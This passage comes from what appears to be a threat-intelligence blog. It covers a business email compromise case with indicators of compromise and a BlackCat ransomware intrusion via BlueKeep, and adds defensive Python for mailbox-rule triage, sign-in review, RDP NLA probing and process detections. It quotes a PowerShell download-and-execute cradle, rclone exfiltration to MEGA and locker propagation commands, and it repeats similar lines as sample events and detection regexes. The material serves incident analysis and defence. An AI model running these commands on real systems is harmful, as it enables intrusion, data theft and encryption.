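        "from_contains": ["finance@partner.example"],
        "move_to_folder": "RSS Feeds",
        "mark_as_read": True,
        "delete_message": False,
        "subject_or_body_contains": ["TRX-2022-", "bank account"],
    },
    {   # the first case study's pattern: delete sign-in/security notices
        "name": "cleanup",
        "from_contains": [],
        "move_to_folder": None,
        "mark_as_read": False,
        "delete_message": True,
        "subject_or_body_contains": ["unusual sign-in", "password"],
    },
]

if __name__ == "__main__":
    for name, reasons in triage_rules(SAMPLE_RULES):
        print(f"rule {name!r}: " + "; ".join(reasons))
```

Run this over the rule set of every mailbox involved in a suspected compromise, not only the one that received the phish, and pair it with the sign-in geolocation review the post describes: a hiding rule created shortly after a sign-in from a new country is the combination worth alerting on.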

Second, the threat actor registered a new domain to impersonate the victim in Hong Kong and send emails to its European counterparts. Notably, the threat actor embedded their phishing emails within existing conversations, an evasive tactic that borrows legitimacy from conversations with established trust. One of the seven (7) phishing emails contained a malicious link (secure[.]membra[.]co[.]uk) that appeared "clean" only because it had not yet been reported as suspicious. However, on deeper inspection we observed that the underlying IP address (45[.]153[.]240[.]153) had been reported as malicious and was previously associated with other subdomains mimicking the Microsoft 365 login page, likely used for global phishing campaigns.

Associated domains (likely past phishing campaigns):
  • login-mso[.]cscsteelsusa[.]com
  • ogin-mso[.]cscsteelsusa[.]com
  • wwwoffice[.]cscsteelsusa[.]com
  • login[.]cscsteelsusa[.]com

Figure: Live screenshot (as of 6/10/22) of login-mso[.]cscsteelsusa[.]com

Third, the threat actor practised poor operational security, including inconsistent use of a virtual private network (VPN); as a result, they may have disclosed that they operate out of Nigeria. While none of the Nigerian IP addresses were reported as malicious across various open-source security tools, Nigeria has been widely reported by security researchers to be a hotspot for cybercrime activity related to business email compromise attacks.[1] Overall, based on open-source investigation of the indicators of compromise from the incident, we conclude with high confidence that the incident was part of a larger-scale mass phishing campaign that opportunistic cybercriminals, likely operating out of Nigeria, conducted without the intention of targeting a specific sector or country, motivated by transferring illicit funds to fraudulent bank accounts for financial gain.

Nigerian IP addresses:
  • 41[.]184[.]152[.]104
  • 41[.]217[.]70[.]163
  • 154[.]118[.]65[.]105

Phishing Kits bypass MFA

PwC’s Dark Lab observes the prevalent development of phishing kits with adversary-in-the-middle (AiTM) capability, with over 10,000 organisations targeted by such attacks since September 2021. These kits package the reverse proxy, login page handling and credential capture so that attackers with low technical skills can execute a convincing phishing attack. AiTM phishing kits are easily accessible on the dark web, and several open-source frameworks are available, including Evilginx2[4], Modlishka[5], and Muraena[6].

AiTM phishing sites are potent because the attacker stands up a reverse proxy between the target user and the website the user intends to visit: the victim is lured to the attacker's domain, which fetches the real login page in the background and relays every request and response in both directions. The victim therefore interacts with the genuine service and completes MFA as normal, while the proxy records the password and, more importantly, the session cookie the service issues once authentication succeeds. Because the attacker replays that cookie rather than the raw credentials or one-time code, they obtain a fully authenticated session, effectively bypassing MFA that relies on passwords, push approvals or TOTP codes.[7]

As enforcement of MFA by organisations and individuals continues to rise, phishing campaigns are expected to move away from traditional credential phishing towards AiTM to overcome the barrier that MFA presents. As threat actors evolve to find innovative ways to circumvent controls and lower the barriers to entry, it becomes even more important for defenders to keep pace with these trends and understand how to prevent, detect, respond to, and recover from such attacks.
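To make the difference between relayable and origin-bound MFA concrete, the following Python is an added illustration, not code from the original post or from any real phishing kit. It models a proxy that forwards a victim's password and TOTP code to a toy relying party and keeps the session cookie, then models the same proxy relaying a WebAuthn-style assertion, where the browser's clientDataJSON records the origin the victim was actually on, so the relying party rejects it. Hostnames, the TOTP seed and the cookie format are assumptions, and the assertion signature itself is left out since the origin check alone decides the outcome.

```python
"""
Toy model of an adversary-in-the-middle (AiTM) phishing proxy, added as an
illustration; it is not code from the original post or from any phishing kit.
Two authenticators are relayed through the same proxy:
  * password + TOTP: the proxy forwards what the victim types and keeps the
    session cookie the real site issues, so the MFA code is simply replayed
  * a WebAuthn-style assertion: the browser records the origin it is really on
    in clientDataJSON, so the relying party rejects what arrives via the proxy
Hostnames, the TOTP seed and the cookie format are assumptions; the assertion
signature is omitted because the origin check alone decides the outcome.
"""
import hashlib
import hmac
import json
import secrets
import struct
import time

REAL_ORIGIN = "https://login.example.com"       # assumed legitimate service
PHISH_ORIGIN = "https://login-mso.example.net"  # assumed AiTM proxy host


class RealSite:
    """Minimal relying party accepting password+TOTP or a WebAuthn-style assertion."""

    def __init__(self):
        self.password = "correct horse"
        self.totp_seed = b"0123456789abcdef0123"   # assumed shared secret
        self.sessions = set()
        self.challenges = set()

    def totp(self, t=None):
        """RFC 6238 TOTP (HMAC-SHA1, 30-second step, 6 digits)."""
        counter = int((time.time() if t is None else t) // 30)
        mac = hmac.new(self.totp_seed, struct.pack(">Q", counter), hashlib.sha1).digest()
        off = mac[-1] & 0x0F
        code = (struct.unpack(">I", mac[off:off + 4])[0] & 0x7FFFFFFF) % 1_000_000
        return f"{code:06d}"

    def issue_session(self):
        cookie = secrets.token_hex(16)
        self.sessions.add(cookie)
        return cookie

    def login_totp(self, password, code, t=None):
        """Nothing here binds the login to the page the user actually typed on."""
        if password == self.password and hmac.compare_digest(code, self.totp(t)):
            return self.issue_session()
        return None

    def new_challenge(self):
        c = secrets.token_hex(16)
        self.challenges.add(c)
        return c

    def login_webauthn(self, client_data_json):
        """Verify type, challenge and, crucially, the origin the browser recorded."""
        cd = json.loads(client_data_json)
        if cd.get("type") != "webauthn.get" or cd.get("challenge") not in self.challenges:
            return None
        if cd.get("origin") != REAL_ORIGIN:   # origin binding: proxy host != real host
            return None
        self.challenges.discard(cd["challenge"])
        return self.issue_session()


def browser_client_data(origin, challenge):
    """What a browser puts in clientDataJSON: the origin it is actually connected to."""
    return json.dumps({"type": "webauthn.get", "challenge": challenge, "origin": origin})


def aitm_relay_totp(site, password, code, t=None):
    """The proxy forwards the victim's password and current code unchanged and keeps the cookie."""
    return site.login_totp(password, code, t)


def aitm_relay_webauthn(site):
    """The proxy forwards a real challenge, but the victim's browser is on PHISH_ORIGIN."""
    challenge = site.new_challenge()
    return site.login_webauthn(browser_client_data(PHISH_ORIGIN, challenge))


def demo(t=1_700_000_000):
    site = RealSite()
    stolen = aitm_relay_totp(site, "correct horse", site.totp(t), t)   # attacker now holds a live session
    phished_fido = aitm_relay_webauthn(site)                            # rejected: wrong origin
    legit_fido = site.login_webauthn(browser_client_data(REAL_ORIGIN, site.new_challenge()))
    return {"totp_session_stolen": stolen in site.sessions,
            "fido_session_stolen": phished_fido is not None,
            "fido_legit_login": legit_fido is not None}


if __name__ == "__main__":
    print(demo())
```

The point the model makes is that a TOTP code carries no information about where it was typed, so a proxy can pass it straight through, whereas a FIDO2 authenticator signs over the origin the browser is connected to and the relying party checks it; number-matching push MFA sits with TOTP on the relayable side.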

Conclusion

As evidenced in both case studies, threat actors orchestrating large scale phishing campaigns pose a significant challenge for targeted victims. This can be observed in the actors’ willingness to wait up to three (3) to four (4) weeks before taking action, using the buffer period to build a strong understanding of the victim’s processes to effectively imitate their victim and evade suspicion.

In both cases, we observed oversights in the victim organisations' security posture that ultimately resulted in their exposure to a BEC attack. In both cases, had multi-factor authentication (MFA) been enabled, the threat actor could have been prevented from gaining access. Similarly, had the second victim organisation established rules to detect abnormal logins, such as flagging an account observed authenticating from multiple geolocations within the span of a week, the organisation could have detected the suspicious activity at an earlier stage and prevented further action.
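One way to implement the abnormal-login check above, as an added example and not part of the original post: a sliding seven-day window over sign-in records, flagging any account seen from three or more countries, plus a simple allow-list check of the kind a conditional access policy enforces. The sign-in records are constructed; the user names, IP addresses and countries are assumptions, and the threshold of three countries is a starting point to tune.

```python
"""
Sign-in review of the kind the conclusion recommends: an account authenticating
from several countries inside one week, and any sign-in from outside the
countries the business actually operates in. Added illustration, not code from
the original post. Records are constructed (user, time, ip, country); in practice
the country comes from the identity provider's sign-in log or an IP geolocation lookup.
"""
from collections import defaultdict
from datetime import datetime, timedelta


def multi_geo_accounts(events, window_days=7, min_countries=3):
    """Map user -> sorted countries for the first window_days window holding >= min_countries."""
    by_user = defaultdict(list)
    for e in events:
        by_user[e["user"]].append((datetime.fromisoformat(e["time"]), e["country"], e["ip"]))
    flagged = {}
    for user, logins in by_user.items():
        logins.sort()
        for i, (start, _, _) in enumerate(logins):
            window = [l for l in logins[i:] if l[0] - start <= timedelta(days=window_days)]
            countries = {c for _, c, _ in window}
            if len(countries) >= min_countries:
                flagged[user] = sorted(countries)
                break
    return flagged


def outside_allowlist(events, allowed_countries):
    """Sign-ins from countries not on the allow-list (the conditional-access view)."""
    return [(e["user"], e["country"], e["ip"])
            for e in events if e["country"] not in allowed_countries]


# Constructed sign-in records (documentation IP ranges, made-up users).
SAMPLE_SIGNINS = [
    {"user": "cfo@victim.example", "time": "2022-08-01T09:15:00", "ip": "203.0.113.10", "country": "HK"},
    {"user": "cfo@victim.example", "time": "2022-08-03T02:40:00", "ip": "198.51.100.23", "country": "US"},
    {"user": "cfo@victim.example", "time": "2022-08-05T22:05:00", "ip": "198.51.100.77", "country": "NG"},
    {"user": "cfo@victim.example", "time": "2022-08-09T11:30:00", "ip": "192.0.2.44", "country": "DE"},
    {"user": "cfo@victim.example", "time": "2022-08-12T08:00:00", "ip": "192.0.2.91", "country": "AU"},
    {"user": "staff@victim.example", "time": "2022-08-02T09:00:00", "ip": "203.0.113.10", "country": "HK"},
    {"user": "staff@victim.example", "time": "2022-08-04T09:05:00", "ip": "203.0.113.10", "country": "HK"},
    {"user": "staff@victim.example", "time": "2022-08-08T08:55:00", "ip": "203.0.113.10", "country": "HK"},
    {"user": "traveller@victim.example", "time": "2022-08-01T09:00:00", "ip": "203.0.113.10", "country": "HK"},
    {"user": "traveller@victim.example", "time": "2022-08-04T17:30:00", "ip": "192.0.2.12", "country": "GB"},
]

if __name__ == "__main__":
    print(multi_geo_accounts(SAMPLE_SIGNINS))
    print(outside_allowlist(SAMPLE_SIGNINS, {"HK"}))
```

A genuine business traveller shows up as two countries in a week; the compromised account in this case would have shown four or five, so the country threshold separates the two without needing velocity calculations.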

To effectively protect against phishing and BEC attacks, it is vital that organisations enforce a layered defense strategy – combining robust preventative measures with intuitive detective protocols.

Recommendations

While phishing legitimate brands and business email compromises will remain a problem, companies can take action to mitigate and prevent the threat they pose.

  • Enhance security controls by establishing procedures in defining “significant” financial transactions and their respective handling procedures, for example automatic bank notifications for outbound transaction verifications and mandatory out-of-band verifications of bank account changes.
  • Develop and exercise a layered defense strategy, incorporating well-defined preventative and detective measures.
  • Organisations should review their Microsoft 365 configuration and update their email security solutions and network devices (including external firewall, web proxies).
  • Implement conditional access policies with geo-location/IP address restrictions to reduce the risk of unauthorised overseas access to Microsoft 365, and regularly review the authentication records of key financial staff (e.g. Chief Financial Officer, Financial Controller).
  • Organisations should establish rules to restrict unauthorised devices from accessing company resources. For example, enforcing limitations on what devices can access company resources and creating onboarding procedures to enrol authorised devices, such as an employee’s personal mobile phone, before they are able to access company resources.
  • Enforce strong multi-factor authentication (MFA), such as number matching, for all users.
  • To protect against AiTM attacks, organisations should implement a layered defense strategy that combines MFA with other preventative and detective measures: phishing-resistant MFA based on FIDO2/WebAuthn or certificate-based authentication (which bind the credential to the legitimate origin, so a login relayed through a proxy fails), conditional access policies, and continuous monitoring for abnormal activity.
  • Implement a periodic checking process to detect suspicious behaviour such as abnormal logins, mailbox rules, email forwarding rules, and application consent activity.
  • Organisations should monitor newly registered (young) domains that resemble their own and alert on suspicious ones for further action (e.g. domain takedown). This task is typically conducted by our Security Operations Centre for subscription clients, and supported by our Cyber Threat Operations function which includes the Threat Intelligence and Incident Response pillars.
  • Conduct regular awareness training to educate the workforce on how to detect suspicious activity, highlighting new TTPs and clear warning signs, and provide clear instructions on the steps to take if they believe they have been targeted by a phishing email. Awareness training can also be completed in the form of phishing simulations to test employees’ susceptibility to phishing emails and fraud (i.e. simulate a sudden change of bank account information to determine if the relevant team detects the unusual behaviour and responds accordingly).
  • Users should remain wary of the legitimacy of webpages and their branding, and if in doubt navigate to the service’s known address rather than following a link (particularly a shortened one). BEC-impacted companies should issue circulars and alerts as necessary when impersonation attempts are detected.
  • We further advise organisations to create Microsoft 365 mail flow (transport) rules and alerts for inbound/outbound mail involving the malicious IP addresses listed in our Indicators of Compromise (IoC) section.

MITRE ATT&CK TTPs Leveraged

We include the observed MITRE ATT&CK tactics and techniques elaborated from the incident.

  • Acquire Infrastructure: Domains – T1583.001
  • Virtual Private Server – T1583.003
  • Botnet – T1583.005
  • Compromise Email Accounts – T1586.002
  • Phishing – T1566
  • Spear Phishing Link – T1566.001
  • Trusted Relationship – T1199
  • Email Hiding Rules – T1564.008
  • SharePoint – T1213.002
  • Remote Email Collection – T1114.002

Indicators of Compromise (IoCs)

Indicator | Type
www[.]yinqsite[.]com | Known bad domain
login-microsoftonnex-mso[.]yinqsite[.]com | Known bad domain
yinqsite[.]com | Known bad domain
ogin-mso[.]wonjiinco[.]co | Known bad domain
glprop-okta-2f0bc4a0[.]wonjiinco[.]com | Known bad domain
stscn-lenovo-c9b8a5aa[.]wonjiinco[.]com | Known bad domain
msaauth-msasafety-95cce817[.]wonjiinco[.]com | Known bad domain
sts-glb-nokia-a6db40b3[.]wonjiinco[.]com | Known bad domain
sts-posteitaliane-694c6373[.]wonjiinco[.]com | Known bad domain
gas-mcd-37816100[.]wonjiinco[.]com | Known bad domain
login-mso[.]wonjiinco[.]com | Known bad domain
wonjiinco[.]com | Known bad domain
ogin-mso[.]cscsteelsusa[.]com | Known bad domain
wwwoffice[.]cscsteelsusa[.]com | Known bad domain
login[.]cscsteelsusa[.]com | Known bad domain
sts01-nestle-382a43f3[.]cscsteelsusa[.]com | Known bad domain
stscn-lenovo-a3ae4e78[.]cscsteelsusa[.]com | Known bad domain
fs-ncoc-a241b101[.]cscsteelsusa[.]com | Known bad domain
login-mso[.]cscsteelsusa[.]com | Known bad domain
www[.]cscsteelsusa[.]com | Known bad domain
kolroff[.]com | Known bad domain
xsbrane[.]com | Known bad domain
cscsteelsusa[.]com | Known bad domain
belasting-betalen[.]finance | Known bad domain
macopas[.]com | Known bad domain
95[.]216[.]126[.]229 | IP address
15[.]204[.]25[.]141 | IP address
Newsletter Software SuperMailer | Enterprise application created by threat actor
45[.]153[.]240[.]153 | IP address
185[.]54[.]228[.]88 | IP address
185[.]202[.]175[.]6 | IP address
103[.]231[.]89[.]230 | IP address
41[.]184[.]152[.]104 | IP address
155[.]94[.]141[.]30 | IP address

Further information

Feel free to contact us at [threatintel at darklab dot hk] for any further information.

The Black Cat’s Out of the Bag

Dark Lab responded to a lesser seen ransomware breed in Hong Kong attributable to ALPHV/BlackCat. We outline the tactics, techniques and procedures of the threat actor, and share our recommendations to ensure readers do not have a cat in hell’s chance of becoming the next victim.

In the second half of 2022, Dark Lab responded to an incident impacting a non-profit professional services organization in Hong Kong. Available evidence suggests that one of the affiliates of the cybercriminal group ALPHV, otherwise known as BlackCat Ransomware-as-a-Service (RaaS), were likely behind the incident.

Reports of BlackCat first emerged in mid-November 2021, and the RaaS group swiftly gained notoriety for their use of the then-unconventional programming language Rust, their flexibility to self-propagate and target multiple devices and operating systems, and a growing affiliate base with previous links to prolific threat activity groups including the DarkSide/BlackMatter and LockBit 2.0 RaaS programmes.[1] The financially motivated cybercriminal group’s targets are selected opportunistically rather than with an intent to target specific sectors or geographies, but as of 31 August 2022 their leak site showed 136 organisations successfully targeted across the United States, Europe, and the Asia Pacific region.

BlackCat is a lesser seen ransomware breed in Hong Kong. However, we posit they may continue to target the region, due to their opportunistic nature and scalability through their affiliate network. In this blog, we will analyse Dark Lab’s recent encounter with BlackCat, their Tactics, Techniques, and Procedures (TTPs), and share insights and recommendations on how to detect and respond to prospective attacks.

Analysis and Exploitation in the wild

Initial Access

Based on the available audit logs, the threat actor likely leveraged CVE-2019-0708 (BlueKeep), a critical pre-authentication remote code execution vulnerability in Remote Desktop Services (formerly known as Terminal Services) that affects older versions of Windows.[2] To exploit it, an unauthenticated attacker sends specially crafted requests to the target system’s Remote Desktop Service over the Remote Desktop Protocol (RDP); no user interaction is required. An attacker who successfully exploits this vulnerability can execute arbitrary code on the target system, including installing programs; viewing, changing, or deleting data; or creating new accounts with full user rights.[3] It should be noted that the RDP protocol itself is not the flaw: the vulnerability lies in how Remote Desktop Services handles connection requests before authentication, which is why Network Level Authentication mitigates it.

Over the first three (3) days, three of the five (3 of 5) potentially malicious IP addresses gained access to the vulnerable workstation in the victim environment, which was exposed to the Internet. The first two IP addresses logged in one day apart and, per various public sources, had been flagged as potentially malicious dating back to December 2021.[4] Time spent in the environment was minimal, no more than a couple of hours combined, with execution of Advanced Port Scanner and Mimikatz observed in the second session. More details are elaborated in the next section.

Meanwhile, the third IP address was not previously reported to be malicious. The time spent in the environment was increased to almost eight (8) hours, though based on the available audit logs we were unable to ascertain the actions of the threat actor. Notably, the threat actor then remained silent for slightly over one (1) week between the initial login from the third IP address to the subsequent login of the fourth IP address. A fifth IP address was also observed to have logged on to the vulnerable workstation thereafter.

While we are unable to attribute any of those five (5) IP addresses to specific threat actors, we hypothesize that there are two groups of threat actors – the first being an initial access broker as categorized by the first two IP addresses, and the second being the BlackCat affiliate as categorized by the remaining three IP addresses.

Suspected Threat Actor | Country | Reported Malicious on OSINT Platforms | First Reported | Day of Access | Time in Environment
Initial Access Broker | Belize | Yes | April 2022 | Day 1 | 5 mins
Initial Access Broker | Russia | Yes | June 2022 | Day 2 | 1 hour
BlackCat Affiliate | Russia | No | n/a | Day 3 | 7 hours
BlackCat Affiliate | USA | No | n/a | Day 10 | 9 hours
BlackCat Affiliate | USA | No | n/a | Day 10 | 2 days 4 hours

Through investigation of the compromised user account, we determined that the victim’s device was unknowingly exposed to the Internet because of a multi-homing issue: the device was connected both to the corporate network and to a standalone network with its own external firewall and network configuration, and the latter exposed the device to the Internet. We further observed that the workstation had not been updated for several years, leaving it unpatched and vulnerable to exploitation.

CVE(s): CVE-2019-0708
First Published Date: CVE record reserved 26 November 2018; Microsoft advisory and security updates published 14 May 2019
CVSS v3: 9.8
Affected Versions: Windows 7, Windows Server 2008 R2, Windows Server 2008 and earlier (including out-of-support Windows XP and Windows Server 2003).
Description: A remote code execution vulnerability exists in Remote Desktop Services (formerly known as Terminal Services) when an unauthenticated attacker connects to the target system using RDP and sends specially crafted requests, aka "Remote Desktop Services Remote Code Execution Vulnerability".[5]
Potential Impact: Pre-authentication remote code execution with no user interaction, enabling threat actors to gain initial access and execute malicious code.
Proof of Concept (PoC) Available: Yes[6]
Exploited in the Wild: Yes[7]
Patch Available: Yes. Microsoft released security updates in May 2019 for all affected versions, including the out-of-support Windows XP and Windows Server 2003. Where possible, upgrade to a supported Windows version, which also brings patches for unrelated vulnerabilities.
Workaround Available: Microsoft[8] has provided potential workarounds:
  • Disable Remote Desktop Services if they are not required.
  • Enable Network Level Authentication (NLA) on systems running supported editions of the affected Windows versions. NLA requires the client to authenticate before the vulnerable code path is reached, so an attacker would need valid credentials to trigger the flaw.
  • Block TCP port 3389 at the enterprise perimeter firewall.
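A practical follow-up to the workarounds above is to check which exposed RDP hosts actually enforce NLA. The following Python is an added example, not from the original post: it builds the first X.224 Connection Request of the RDP negotiation (MS-RDPBCGR), offering only standard RDP security, and interprets the server's Connection Confirm. A server that answers RDP_NEG_FAILURE with HYBRID_REQUIRED_BY_SERVER enforces NLA; one that accepts PROTOCOL_RDP (or sends no negotiation response at all) still exposes the pre-authentication path that BlueKeep abuses. The two sample responses are constructed byte strings, not captured traffic, and the probe function should only be pointed at hosts you are authorised to test.

```python
"""
RDP negotiation probe for hosts exposed like the multi-homed workstation above.
Added illustration, not from the original post. It speaks only the first
X.224 Connection Request / Confirm exchange of MS-RDPBCGR: it offers
PROTOCOL_RDP (standard RDP security, no NLA) and reads the server's answer.
The sample responses below are constructed, not captured from any host.
"""
import socket
import struct

PROTOCOL_RDP, PROTOCOL_SSL, PROTOCOL_HYBRID = 0x0, 0x1, 0x2
PROTOCOL_NAMES = {PROTOCOL_RDP: "PROTOCOL_RDP", PROTOCOL_SSL: "PROTOCOL_SSL",
                  PROTOCOL_HYBRID: "PROTOCOL_HYBRID"}
TYPE_NEG_REQ, TYPE_NEG_RSP, TYPE_NEG_FAILURE = 0x01, 0x02, 0x03
FAILURE_CODES = {
    1: "SSL_REQUIRED_BY_SERVER", 2: "SSL_NOT_ALLOWED_BY_SERVER",
    3: "SSL_CERT_NOT_ON_SERVER", 4: "INCONSISTENT_FLAGS",
    5: "HYBRID_REQUIRED_BY_SERVER", 6: "SSL_WITH_USER_AUTH_REQUIRED_BY_SERVER",
}


def build_connection_request(requested_protocols=PROTOCOL_RDP):
    """TPKT + X.224 Connection Request carrying an RDP_NEG_REQ (19 bytes in total)."""
    neg_req = struct.pack("<BBHI", TYPE_NEG_REQ, 0, 8, requested_protocols)
    # X.224 CR TPDU after the length indicator: code 0xE0, dst-ref, src-ref, class 0
    x224 = struct.pack(">BHHB", 0xE0, 0, 0, 0) + neg_req
    x224 = struct.pack(">B", len(x224)) + x224
    return struct.pack(">BBH", 3, 0, 4 + len(x224)) + x224


def assess_connection_confirm(data):
    """Parse the server's X.224 Connection Confirm and say what it will accept."""
    if len(data) < 11 or data[0] != 3:
        raise ValueError("not a TPKT-framed X.224 PDU")
    if (data[5] & 0xF0) != 0xD0:
        raise ValueError("not an X.224 Connection Confirm")
    body = data[11:19]
    if len(body) < 8:
        # No RDP_NEG_RSP at all: legacy server that only speaks standard RDP security
        return {"plain_rdp_accepted": True, "nla_required": False,
                "detail": "no negotiation response (standard RDP security only)"}
    kind, _flags, _length, value = struct.unpack("<BBHI", body)
    if kind == TYPE_NEG_FAILURE:
        name = FAILURE_CODES.get(value, f"code {value}")
        return {"plain_rdp_accepted": False, "nla_required": value == 5,
                "detail": f"RDP_NEG_FAILURE {name}"}
    if kind == TYPE_NEG_RSP:
        return {"plain_rdp_accepted": value == PROTOCOL_RDP, "nla_required": False,
                "detail": f"server selected {PROTOCOL_NAMES.get(value, value)}"}
    raise ValueError(f"unexpected negotiation structure type {kind}")


def probe(host, port=3389, timeout=5.0):
    """Live check against a host you are authorised to test (not exercised by the samples)."""
    with socket.create_connection((host, port), timeout=timeout) as s:
        s.sendall(build_connection_request(PROTOCOL_RDP))
        return assess_connection_confirm(s.recv(64))


def make_confirm(neg_payload):
    """Constructed Connection Confirm in the shape a server returns for the request above."""
    x224 = struct.pack(">BHHB", 0xD0, 0, 0x1234, 0) + neg_payload
    x224 = struct.pack(">B", len(x224)) + x224
    return struct.pack(">BBH", 3, 0, 4 + len(x224)) + x224


SAMPLE_NLA_REQUIRED = make_confirm(struct.pack("<BBHI", TYPE_NEG_FAILURE, 0, 8, 5))
SAMPLE_PLAIN_RDP_ACCEPTED = make_confirm(struct.pack("<BBHI", TYPE_NEG_RSP, 0, 8, PROTOCOL_RDP))
SAMPLE_LEGACY_NO_NEG = make_confirm(b"")

if __name__ == "__main__":
    for label, sample in (("nla", SAMPLE_NLA_REQUIRED), ("plain", SAMPLE_PLAIN_RDP_ACCEPTED),
                          ("legacy", SAMPLE_LEGACY_NO_NEG)):
        print(label, assess_connection_confirm(sample))
```

Running the probe across the external ranges in an asset inventory is a quick way to find hosts like the one in this case: anything that reports plain_rdp_accepted is reachable without credentials and needs either NLA enforced, the port blocked at the perimeter, or both.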

Credential Access and Discovery by Suspected Initial Access Broker

We observed the threat actor deploy Advanced Port Scanner[9] to scan the network for hosts with open ports, identifying reachable systems and exposed services to target.

The threat actor then executed Mimikatz[10] to dump the memory of the Local Security Authority Subsystem Service (LSASS) process and obtain various credentials, including an account with domain administrator rights. This credential was later used for lateral movement.

Handover to Suspected BlackCat Affiliate for Further Discovery and Command & Control

We observed the threat actor run a PowerShell download cradle that retrieved and executed a Cobalt Strike Beacon (beacon.exe)[11] to initiate a connection with their command-and-control (C2) server, establishing a foothold on the victim network. The C2 channel enabled remote access to the environment without RDP, as well as further intrusion by leveraging the various features provided by the implant.

The Beacon connected to a Cobalt Strike team server hosted on a public cloud provider, potentially also used to stage their toolkit, via this command: powershell.exe -nop -w hidden -c IEX ((new-object.netclient).downloadstring("http:///a'). The -nop (no profile), -w hidden and IEX (Invoke-Expression) switches are the classic download-and-run cradle: the script is fetched from the remote host and executed in memory rather than written to disk. Subsequently, the threat actor deployed AdFind.exe[12] to perform Active Directory reconnaissance, retrieving a list of accounts within the network.

BlackCat affiliates have been observed in the past to leverage AdFind.exe in conjunction with PowerShell to establish a persistent foothold on a target network, and thereafter to download and execute malicious payloads.[13] That this activity was only seen from the fourth and fifth IP addresses, and not the first three, lends further credence to our hypothesis that the first set of IP addresses belonged to an initial access broker.

Lateral Movement

Through enumeration of the victim’s environment, the threat actor identified the critical systems ideal for targeting, including the domain controller, back-up servers, and the anti-virus management server. The threat actor noted that the anti-virus management server had no Endpoint Detection and Response (EDR) agent installed. Selective targeting of critical systems without EDR coverage is common practice among sophisticated threat actors, as such hosts let them stage their attack while evading detection.

Having identified the critical systems, the threat actor used the stolen domain administrator account to initiate remote desktop (RDP) connections. This enabled lateral movement from the compromised multi-homed workstation to the targeted endpoints, as the flat network environment, with basic or no network segmentation in place, placed no barrier in the way.

Defense Evasion

The threat actor exercised various acts of defense evasion, including masquerading their tools and their means of lateral movement. A key indicator tying this incident to BlackCat RaaS is the renaming of their tooling (here dropped as svchost.exe under C:\ProgramData, see the IoCs below), an evasive manoeuvre often used by BlackCat affiliates to make a malicious process appear to be the legitimate Windows svchost process.[14] The legitimate binary lives in C:\Windows\System32 (or SysWOW64), so an svchost.exe executing from any other path is a reliable detection.

Exfiltration

The threat actor proceeded to manually deploy the malware on the anti-virus management server, initiating the self-propagation process, while deploying rclone.exe[15] to exfiltrate data to their cloud storage on MEGA. Notably, while MEGA, the New Zealand-based cloud service, is a legitimate and trusted platform, it is also popular with cybercriminals because accounts can be paid for in Bitcoin.[16]

Security researchers have reported that BlackCat affiliates leverage rclone.exe to collect and exfiltrate large volumes of data from victim networks.[17] The threat actor executed the following command to exfiltrate data from the target network: ProgramData\rclone.exe

Impact

Having exfiltrated data, the threat actor encrypted the victim’s endpoints, executing locker.exe on various hosts with the following commands (access token values omitted):

  • "C:\Windows\locker.exe" --child --access-token --verbose
  • "C:\Windows\locker.exe" --access-token -v --no-prop-servers \ --propagated

The commands activate the BlackCat payload. The --no-prop-servers switch in the second command indicates that the malware can self-propagate, and that the threat actor deliberately excluded certain servers, most likely those able to detect their movements, while propagating to the critical servers they had selected.

It is worth noting that self-propagation is not a common feature of ransomware. Ultimately, the goal of threat actors is to gain a foothold on a network as quickly as possible for exfiltration and extortion. Self-propagation can work against this need for speed, as it requires time to enumerate the network and select targets, as well as a manual initial deployment. With that said, after the initial deployment the BlackCat ransomware is able to self-propagate, scaling across the network quickly and extending the attacker’s reach while evading detection.
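The activity in the last four sections leaves distinctive process-creation events. The following Python is an added example, not code from the original post: it applies six simple detections to Sysmon/4688-style records for shadow-copy deletion, a hidden-window PowerShell download cradle, svchost.exe running outside the Windows system directories, rclone and AdFind execution, and the BlackCat locker's --access-token/--no-prop-servers flags. The events are constructed, with documentation addresses rather than the incident's IoCs, and the field names (image, cmdline) are assumptions about your log schema.

```python
"""
Process-creation detections for the tradecraft in the sections above
(shadow-copy deletion, PowerShell download cradle, svchost.exe masquerading,
rclone exfiltration, AdFind enumeration, BlackCat locker propagation flags).
Added illustration, not code from the original post. Events are constructed
in a simplified Sysmon/4688 shape (image, cmdline); addresses are
documentation values, not the incident's IoCs.
"""
import ntpath
import re

SYSTEM_DIRS = ("c:\\windows\\system32\\", "c:\\windows\\syswow64\\")


def base(img):
    """Lower-cased file name of a Windows path, regardless of the host OS."""
    return ntpath.basename(img).lower()


RULES = [
    ("shadow_copy_deletion", lambda img, cmd:
        re.search(r"\bvssadmin(\.exe)?\b.*\bdelete\s+shadows\b", cmd, re.I)
        or re.search(r"\bwmic(\.exe)?\b.*\bshadowcopy\s+delete\b", cmd, re.I)),
    ("powershell_download_cradle", lambda img, cmd:
        re.search(r"powershell", cmd, re.I)
        and re.search(r"-w(indowstyle)?\s+hidden", cmd, re.I)
        and re.search(r"\b(iex|invoke-expression)\b", cmd, re.I)
        and re.search(r"downloadstring|downloadfile|net\.webclient", cmd, re.I)),
    # the legitimate svchost.exe only runs from the system directories
    ("svchost_masquerade", lambda img, cmd:
        base(img) == "svchost.exe" and not img.lower().startswith(SYSTEM_DIRS)),
    # rclone has no business on a server that is not a backup host
    ("rclone_exfiltration", lambda img, cmd:
        base(img) == "rclone.exe" and re.search(r"\b(copy|sync|move)\b", cmd, re.I)),
    ("adfind_enumeration", lambda img, cmd: base(img) == "adfind.exe"),
    ("blackcat_locker_flags", lambda img, cmd:
        re.search(r"--access-token\b", cmd, re.I)
        and re.search(r"--(no-prop-servers|propagated|child)\b", cmd, re.I)),
]


def detect(events):
    """Return [(rule_name, event)] for every rule that fires on each event."""
    hits = []
    for ev in events:
        img, cmd = ev.get("image", ""), ev.get("cmdline", "")
        for name, check in RULES:
            if bool(check(img, cmd)):
                hits.append((name, ev))
    return hits


# Constructed events: one per technique plus two benign controls.
SAMPLE_EVENTS = [
    {"image": r"C:\Windows\System32\cmd.exe",
     "cmdline": r'cmd.exe /c "vssadmin.exe Delete Shadows /all /quiet"'},
    {"image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell.exe -nop -w hidden -c IEX ((new-object net.webclient)"
                ".downloadstring('http://203.0.113.5/a'))"},
    {"image": r"C:\ProgramData\svchost.exe",
     "cmdline": "svchost.exe -connect 203.0.113.5:8443 -pass x"},
    {"image": r"C:\Windows\System32\svchost.exe", "cmdline": "svchost.exe -k netsvcs"},
    {"image": r"C:\ProgramData\rclone.exe",
     "cmdline": r"rclone.exe copy D:\Finance mega:exfil --transfers 8"},
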